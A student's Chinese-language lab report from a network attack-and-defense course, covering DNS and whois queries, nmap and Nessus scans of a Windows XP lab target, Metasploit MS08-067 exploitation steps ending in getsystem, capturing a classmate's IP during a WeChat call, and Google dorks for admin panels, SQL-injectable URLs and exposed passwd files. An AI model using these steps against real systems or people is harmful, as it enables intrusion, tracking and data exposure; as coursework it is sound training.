20232313 2025-2026-1 《网络与系统攻防技术》实验五实验报告

1.实验内容


基本实验内容如下:

  • 从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取信息;
  • 尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置;
  • 使用nmap开源软件对靶机环境进行扫描,回答问题并给出操作命令;
  • 使用Nessus开源软件对靶机环境进行扫描,回答问题并给出操作命令;
  • 通过搜索引擎搜索自己在网上的足迹,并练习使用Google hack搜集技能完成搜索。

2.实验过程

总共5个任务,如下:
(1)DNS与IP信息查询;
(2)尝试获取QQ中某一好友的IP地址,并查询获取该好友所在的具体地理位置;
(3)使用nmap开源软件对靶机环境进行扫描,回答问题;
(4)使用Nessus开源软件对靶机环境进行扫描,回答问题并给出操作命令;
(5)通过搜索引擎搜索自己在网上的足迹,并练习使用Google hack搜集技能完成搜索。

我们一个一个来看。

(1)关于baidu.com的DNS与IP信息查询;

(1.1) 查询该域名对应IP地址

使用dig baidu.com,如下:
60a84bbef03bc9b2e2450cd22ec11291
可以看到域名对应的IP地址,如图标红部分。
使用nslookup baidu.com效果类似:
1fbcb91d6776733cd2744a9c92436b2d

(1.2)查询DNS注册人、IP注册人及联系方式

使用whois baidu.com
71bffa35134e6ba0d2dbb2bb2c3cb090
可以知道:
1.baidu.com这个域名是上海马克蒙信息科技公司注册的。
2.它是1999年10月11号创建的。
3.现在域名不能删除、修改或者转移,处于保护状态。
4.用的服务器是NS1到NS7这些百度自己的域名服务器。

使用whois 110.242.74.102对第一个ip进行查询。
可以看到IP注册人以及对应的联系方式。
000a27a427633c033c8a51c72953c8db

(1.3)查询IP地址所在国家、城市和具体地理位置

访问IP 66网站,对IP进行精准查询,可以看到具体位置如下:
26418eb4323e01b8fa04bf4e0d0ae8b9

(1.4)使用traceroute和tracert命令追踪

使用traceroute baidu.com,这里指的是使用UDP探测包的情况下。
可以看到第二跳及之后都是的状态。查询得知是互联网服务提供商的网络设备出于安全的考虑不回应traceroute请求。如下:
b19bc80054767b1ab96b664a98fb42e6
使用traceroute -I baidu.com,这里-I指的是发送的的是ICMP报文.可以看到虽然中间还是
,但是结尾可以看到了。
3843a168d05d81ecccce7d72fe75da6f
使用sudo traceroute -T baidu.com,使用tcp连接,可以看到在最后有IP地址:
acffb08293d34cd607fd17ccf2573aed
在Windows下使用tracert baidu.com,可以在Windows上获取ip信息,如下:
2fb5d701da2c9f2512c424500b7823cc

(2)尝试微信中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

打开wireshark开始抓包,然后用微信给同学打电话,同时观察抓包情况:
c0db86e06447c8a7caf9a0a8a7889807
可以看到当我的电脑打杨红星同学的电脑的时候,一瞬间出现了大量的UDP包,
在第456行可以发现我的IP地址和他的IP地址。验证如下,可以获取正确的地址:
1ff0e8b2420478ad86945594c858ecf8
关于准确地址,这个用上面的IP66工具就可以。因为我的免费三次次数今天已经用完了,所以在这里就不演示地址了。

(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

靶机采用的是Windows XP Professional。IP信息如下:
081e07d1960602c6fa8e367037e9d6a3

(3.1)靶机IP地址是否活跃

使用nmap -sn 192.168.126.0/24,在这里-sn禁用端口扫描,仅执行主机发现(Ping 扫描)。
可以看到靶机在线,如下:
ebafdada61e586dd16fb72406a6d9d84

(3.2) 靶机开放了哪些TCP和UDP端口

使用nmap -sT -sU -p 20-23,53,80,443,3389 192.168.126.145扫描常见的TCP/UDP端口。
-sT是建立完整三次握手的TCP扫描,-sU是进行udp扫描,-p指定常见端口。
fcbd3a457740e4f6dac4ac5403ced2e2
可以看到图上红框部分都是open或者filtered的状态

(3.3) 靶机安装了什么操作系统,版本是多少

需要提前关闭靶机的防火墙。使用nmap -O -T4 192.168.126.145
-O是 操作系统检测(OS Detection)选项。它的作用是让 Nmap 尝试识别目标主机运行的操作系统类型和版本。-T4是加速扫描的作用。
8a1613069cda9ebce3cfcc5c2ce1be05
结果显示,操作系统为Microsoft Windows XP SP2或SP3

(3.4) 靶机上安装了哪些服务

使用nmap -sV 192.168.126.145,-sV作用是识别目标主机上开放端口对应的服务及其详细版本信息。
ff67dff61f660a4c7dff2db47fbda85c
可以看到显示安装了红框的三个应用。

(4) 使用Nessus开源软件对靶机环境进行扫描,回答问题并给出操作命令

(4.1) 靶机上开放了哪些端口

点Nessus右上角New Scan:
be6fc20cf8534d8c711f658a520d6b97
选择host discovery:
e8fe7e7c93d5ad1ab66e8c8ba7029677
可以看到有如下开放端口:
9f58bfdb5dcb92af5897abffef92585b

(4.2) 靶机各个端口上网络服务存在哪些安全漏洞

新建扫描,这次选择Advanced Scan,结果如下:
f1d918542a0fac4ca81f739e27967219
点击进去第一个mixed漏洞详细查看,可以看到很多高危漏洞包括MS09-001,MS08-067,MS17-010等等:
6a7c074829618ceebf2d8377cfd9e5b0

(4.3) 你认为如何攻陷靶机环境,以获得系统访问权

可以通过msf,选择漏洞后主动攻击靶机:
输入msfconsole进入msf,
输入search ms08-067寻找漏洞对应的版本。
由之前的信息收集,我们可以知道我们要选择35号版本。
c1642776a9acd9a3c3ab77ad5ce6576a
输入use 35使用,再输入set rhost 192.168.126.145设置远程连接的ip地址(即被攻击机的ip),最后使用exploit执行,再输入getsystem获取shell:
f4506b478a3e33b898b5254ca0eee0ea
至此,我们可以直接利用漏洞主动攻击靶机。

(5) 练习Google Hacking技能

(5.1) 通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。

1)搜索自己的姓名:
008aaf49202b979ca8babfa6abc3b3ce
发现没有信息泄露。
2)搜索学号:
38b50b70b33b56c1274d8a6458c56cf7
发现可以找到我主动发布的实验报告。

(5.2)练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

1)使用site:example.com形式限定搜索范围
输入site.www.besti.edu.cn
627e13cf5cae6d1fe98e91dd8e3e5312
2) 使用intitle:"后台登录"形式查找网页标题中包含“后台登录”等关键词的页面,用于寻找网站的管理后台入口
输入intitle:"后台登录":
e221b2b6cc7e6f86f47c4293dbdcf0ad
3)使用inurl:/admin/login.php形式直接搜索URL地址中包含特定路径(如管理后台登录页面)的网页
输入inurl:/admin/login.php
bdf502f278766c0e027e221c38d4c68d
4)使用filetype:pdf site:gov.cn形式在指定的网站或域名范围(如gov.cn)内,搜索特定类型的文件(如PDF文档)
输入filetype.pdf site.gov.cn:
fa2c1bb013565dc6dfe87e0bc90a4cb8
5)使用intext:"索引位于" "转到父目录"形式查找因Web服务器配置错误而可被随意浏览目录文件列表,从而可能导致敏感文件泄露的网站
输入intext:"索引位于""转到父目录":
6dd9101100f2194afb7289a5b599871a
6) 使用link:http://www.baidu.com用于查找所有包含指向 http://www.baidu.com的网页
输入link:http://www.baidu.com:
efab17bf5b23e8857f5596fc49b15d63
7)使用related:https://www.besti.edu.cn/查找与https://www.besti.edu.cn/ 网页的布局相似的页面。
输入related:https://www.besti.edu.cn/
54826a5077b2e3d921c7e27dda965c00
8)使用inurl: .php?id=用于查找可能包含sql注入的网址。
输入inur: php?id=:
25b5b2548249f8b0223b7e228bc48770
9)使用"index of" / "passwd"形式尝试查找服务器上存储系统用户账户信息的敏感文件如/etc/passwd)
输入"index of" /"passwd":
58619dbf388e2c18eebce91022b89e41
10)使用site:example.com (intext:"@example.com" OR "邮件")形式收集与目标网站相关的电子邮件地址等信息,可用于社会工程学评估
输入site:besti.edu.cn (intext."@besti.edu.cn" OR "邮件":
d608d78d71828bc328bb0e99ecc87bcf

3.问题及解决方案

参考资料

posted @ 2025-11-16 21:09  20232313-吴至远  阅读(3)  评论(0)    收藏  举报